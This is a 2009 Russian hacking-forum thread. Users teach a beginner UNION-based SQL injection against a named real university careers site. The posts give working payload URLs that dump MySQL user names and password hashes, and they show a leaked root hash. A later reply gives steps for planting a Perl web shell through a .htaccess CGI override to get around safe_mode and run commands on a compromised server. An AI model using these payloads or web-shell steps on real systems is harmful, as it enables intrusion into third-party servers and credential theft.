14.05.2009, 19:58
|
|
Познающий
Регистрация: 07.05.2009
Сообщений: 64
С нами:
8953743
Репутация:
59
|
|
wildshaman, мб мы не будем флудить??
Сообщение от jecka3000
Еще один вопрос. Нашел на сайте скулю. Какими командами заставить вывести лоигн и пароль администратора (пускай даже в виде хэша)?
Возьмём за пример твою же скулю, тоторую ты выклодовал:
Код:
http://career.mgimo.ru/external/events/partner.php?act=show&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*
Мы видим что принтабельный столбец - 2
Проверим версию БД выполнив команду version()
Код:
http://career.mgimo.ru/external/events/partner.php?act=show&id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11+from+mysql.user/*
получаем:
Это значит, что название таблиц и колонок прийдётся подбирать вручную, так как в 4-той версии нет прекрасной INFORMATION_SCHEMA
Но изучив бд mysql мы уже знаем, что там присутствуют колонки user и password
Имея эти даные мы составляем следующие запрос к базе данных:
Код:
http://career.mgimo.ru/external/events/partner.php?act=show&id=-1+union+select+1,user,3,4,5,6,7,8,9,10,11+from+mysql.user/*
Код:
http://career.mgimo.ru/external/events/partner.php?act=show&id=-1+union+select+1,password,3,4,5,6,7,8,9,10,11+from+mysql.user/*
Но ведь не удобно состовлять несколько запросов, не так ди?
Для этого можно использовать функцию concat() или concat_ws()
Пример:
Код:
http://career.mgimo.ru/external/events/partner.php?act=show&id=-1+union+select+1,concat_ws(0x3a,user,password),3,4,5,6,7,8,9,10,11+from+mysql.user/*
И получить всё и сразу:
Код:
root:0e420e231935eccd
0x3a - это двоеточие в хексе!
##################################
Для начала посоветую тебе почитать литературу по php и sql.
После чего можешь приступать к чтению статтей по sql inj
Последний раз редактировалось bug1z; 14.05.2009 в 21:23..
|
|
|
14.05.2009, 20:06
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
С нами:
10158086
Репутация:
1359
|
|
Сообщение от bug1z
wildshaman, мб мы не будем флудить??
Возьмём за пример твою же скулю, тоторую ты выклодовал:
Код:
http://career.mgimo.ru/external/events/partner.php?act=show&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*
Мы видим что принтабельный столбец - 2
Проверим версию БД выполнив команду version()
Код:
http://career.mgimo.ru/external/events/partner.php?act=show&id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11+from+mysql.user/*
получаем:
Это значит, что название таблиц и колонок прийдётся подбирать вручную, так как в 4-той версии нет прекрасной INFORMATION_SCHEMA
Но изучив бд mysql мы уже знаем, что там присутствует такая таблица как mysql, а в ней колонки user и password
Имея эти даные мы составляем следующие запрос к базе данных:
Код:
http://career.mgimo.ru/external/events/partner.php?act=show&id=-1+union+select+1,user,3,4,5,6,7,8,9,10,11+from+mysql.user/*
Код:
http://career.mgimo.ru/external/events/partner.php?act=show&id=-1+union+select+1,password,3,4,5,6,7,8,9,10,11+from+mysql.user/*
Но ведь не удобно состовлять несколько запросов, не так ди?
Для этого можно использовать функцию concat() или concat_ws()
Пример:
Код:
http://career.mgimo.ru/external/events/partner.php?act=show&id=-1+union+select+1,concat_ws(0x3a,user,password),3,4,5,6,7,8,9,10,11+from+mysql.user/*
И получить всё и сразу:
Код:
root:0e420e231935eccd
0x3a - это двоеточие в хексе!
##################################
Для начала посоветую тебе почитать литературу по php и sql.
После чего можешь приступать к чтению статтей по sql inj очень замечательная для обучения скуль 
magic_quotes_gpc=off
file_priv=Y
FreeBSD (!) в общем классно.
|
|
|
|
14.05.2009, 19:45
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
С нами:
9619229
Репутация:
445
|
|
jecka3000 читай мануалы =\
Тут специалисты не собираються переписывать мануалы
|
|
|
|
14.05.2009, 19:47
|
|
Banned
Регистрация: 11.03.2009
Сообщений: 214
С нами:
9035873
Репутация:
317
|
|
Последний раз редактировалось farex; 14.05.2009 в 19:49..
|
|
|
|
14.05.2009, 20:31
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
bug1z, только как мы видим что принтабельный столбец №2 ?
|
|
|
|
14.05.2009, 20:35
|
|
Познающий
Регистрация: 07.05.2009
Сообщений: 64
С нами:
8953743
Репутация:
59
|
|
2jecka3000
при запросе
Код:
http://career.mgimo.ru/external/events/partner.php?act=show&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*
вывелась двойка и тройка!
можешь сипользовать любой! |
|
|
|
15.05.2009, 02:05
|
|
Участник форума
Регистрация: 26.10.2008
Сообщений: 106
С нами:
9231812
Репутация:
40
|
|
на сервере safe_mode=on и disable_functions=passthru, shell_exec, proc_open. Могу инклудить php-код и читать папки и файлы только в папке htdocs и во вложенных, система FreeBSD 6.4-RELEASE-p3. Как при таком раскладе можно выполнять комманды на сервере? Подскажите люди добрые!
|
|
|
|
15.05.2009, 02:14
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами:
10309346
Репутация:
4303
|
|
заливай перловый шелл
|
|
|
|
15.05.2009, 02:32
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами:
10309346
Репутация:
4303
|
|
заливаешь в папку .htaccess
пишешь в него
Options ExecCGI
AddType application/x-httpd-cgi .pl
заливаешь в эту папку shell.pl
ставишь на него chmod 755
и вуаля. Хороший перловый шелл - r57pws - гугл в помощь
|
|
|
|
15.05.2009, 11:11
|
|
Banned
Регистрация: 11.03.2009
Сообщений: 214
С нами:
9035873
Репутация:
317
|
|
jecka3000 только как мы видим что принтабельный столбец №2 ?
Это у тя на страничке отображается......
---------------------------------------
Актуальные мероприятия партнеров
2
Последний раз редактировалось farex; 15.05.2009 в 11:16..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
